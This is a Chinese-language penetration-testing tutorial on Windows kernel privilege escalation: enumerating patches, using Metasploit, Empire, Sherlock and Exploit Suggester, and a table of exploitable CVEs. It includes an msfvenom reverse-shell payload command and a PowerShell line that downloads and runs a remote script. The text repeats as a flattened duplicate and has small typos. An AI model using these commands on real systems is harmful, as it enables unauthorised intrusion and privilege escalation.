Windows下常见的内核溢出提权
字数 1428 2025-08-20 18:17:58

Windows内核溢出提权技术详解

文章前言

在后渗透测试阶段,权限提升是一个绕不开的话题,其中"系统内核溢出提权"因其利用便捷成为了最为常用的方法。该方法通过查看目标系统中已安装的系统补丁,寻找缺失的"互补"补丁,并利用对应的提权类漏洞实现权限提升。

权限查看基础

在获取目标系统shell后,首先需要确认当前用户及其权限:

whoami
whoami /groups

典型输出显示用户权限为"Mandatory Label\Medium Mandatory Level",这是标准普通用户权限。提权目标是将此提升为"High Mandatory Level"。

补丁查询方法

1. 系统命令查看

systeminfo命令

systeminfo

输出显示已安装的补丁列表,如KB2534111、KB2999226等。

WMIC命令

wmic qfe get Caption,Description,HotFixID,InstalledOn

查询特定补丁

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /c:"KB2534111" /c:"KB976902"

2. 辅助网站查询

推荐使用https://bugs.hacking8.com/tiquan/输入补丁号查询缺失的可利用补丁。

3. MSF框架查询

MSF的post/windows/gather/enum_pathes模块可快速查找补丁信息:

  1. 生成payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f exe > shell.exe
  1. 获取meterpreter会话后执行:
run post/windows/gather/enum_patches
  1. 查找可用漏洞:
run post/multi/recon/local_exploit_suggester

4. Empire框架查询

usemodule privesc/powerup/allchecks
execute

5. PowerShell脚本 - Sherlock

Sherlock脚本(GitHub)可检测本地提权漏洞:

加载方式

Import-Module .\Sherlock.ps1
# 或远程加载
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

查询所有漏洞

Find-AllVulns

查询特定漏洞

Find-CVE20177199

6. Windows Exploit Suggester

工具原理:通过比对systeminfo生成的文件发现未修复漏洞。

安装

pip install xlrd
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester

更新漏洞库

./windows-exploit-suggester.py --update

使用流程

  1. 目标系统执行:systeminfo > sysinfo.txt
  2. 本地分析:
./windows-exploit-suggester.py -d 2020-09-09-mssb.xls -i sysinfo.txt

常见提权漏洞列表

安全公告 KB号 影响系统
CVE-2017-0213 - Win10/8.1/7/2016/2010/2008
MS17-010 KB4013389 Win7/2008/2003/XP
MS16-135 KB3199135 2016
MS16-098 KB3178466 Win8.1
MS16-075 KB3164038 2003/2008/7/8/2012
MS16-032 KB3143141 2008/7/8/10/2012
MS15-051 KB3057191 2003/2008/7/8/2012
MS14-058 KB3000061 2003/2008/2012/7/8
MS11-080 KB2592799 2003/XP
MS10-015 KB977165 2003/2008/7/XP

漏洞利用资源

推荐项目:Heptagram,收集了大量公开的Windows提权EXP/POC。

注意事项

  1. 使用EXP时需注意影响的操作系统版本
  2. 部分工具如Windows-Exploit-Suggester的数据库可能较旧(最新到2017年)
  3. 不同工具检测效果可能有差异,建议多种方法结合使用
  4. 实际利用前应在测试环境验证EXP的兼容性

通过系统补丁信息分析结合上述工具,可以高效地发现和利用Windows内核溢出漏洞实现权限提升。

Windows内核溢出提权技术详解 文章前言 在后渗透测试阶段,权限提升是一个绕不开的话题,其中"系统内核溢出提权"因其利用便捷成为了最为常用的方法。该方法通过查看目标系统中已安装的系统补丁,寻找缺失的"互补"补丁,并利用对应的提权类漏洞实现权限提升。 权限查看基础 在获取目标系统shell后,首先需要确认当前用户及其权限: 典型输出显示用户权限为"Mandatory Label\Medium Mandatory Level",这是标准普通用户权限。提权目标是将此提升为"High Mandatory Level"。 补丁查询方法 1. 系统命令查看 systeminfo命令 : 输出显示已安装的补丁列表,如KB2534111、KB2999226等。 WMIC命令 : 查询特定补丁 : 2. 辅助网站查询 推荐使用 https://bugs.hacking8.com/tiquan/ 输入补丁号查询缺失的可利用补丁。 3. MSF框架查询 MSF的 post/windows/gather/enum_pathes 模块可快速查找补丁信息: 生成payload: 获取meterpreter会话后执行: 查找可用漏洞: 4. Empire框架查询 5. PowerShell脚本 - Sherlock Sherlock脚本( GitHub )可检测本地提权漏洞: 加载方式 : 查询所有漏洞 : 查询特定漏洞 : 6. Windows Exploit Suggester 工具原理:通过比对systeminfo生成的文件发现未修复漏洞。 安装 : 更新漏洞库 : 使用流程 : 目标系统执行: systeminfo > sysinfo.txt 本地分析: 常见提权漏洞列表 | 安全公告 | KB号 | 影响系统 | |---------|------|---------| | CVE-2017-0213 | - | Win10/8.1/7/2016/2010/2008 | | MS17-010 | KB4013389 | Win7/2008/2003/XP | | MS16-135 | KB3199135 | 2016 | | MS16-098 | KB3178466 | Win8.1 | | MS16-075 | KB3164038 | 2003/2008/7/8/2012 | | MS16-032 | KB3143141 | 2008/7/8/10/2012 | | MS15-051 | KB3057191 | 2003/2008/7/8/2012 | | MS14-058 | KB3000061 | 2003/2008/2012/7/8 | | MS11-080 | KB2592799 | 2003/XP | | MS10-015 | KB977165 | 2003/2008/7/XP | 漏洞利用资源 推荐项目: Heptagram ,收集了大量公开的Windows提权EXP/POC。 注意事项 使用EXP时需注意影响的操作系统版本 部分工具如Windows-Exploit-Suggester的数据库可能较旧(最新到2017年) 不同工具检测效果可能有差异,建议多种方法结合使用 实际利用前应在测试环境验证EXP的兼容性 通过系统补丁信息分析结合上述工具,可以高效地发现和利用Windows内核溢出漏洞实现权限提升。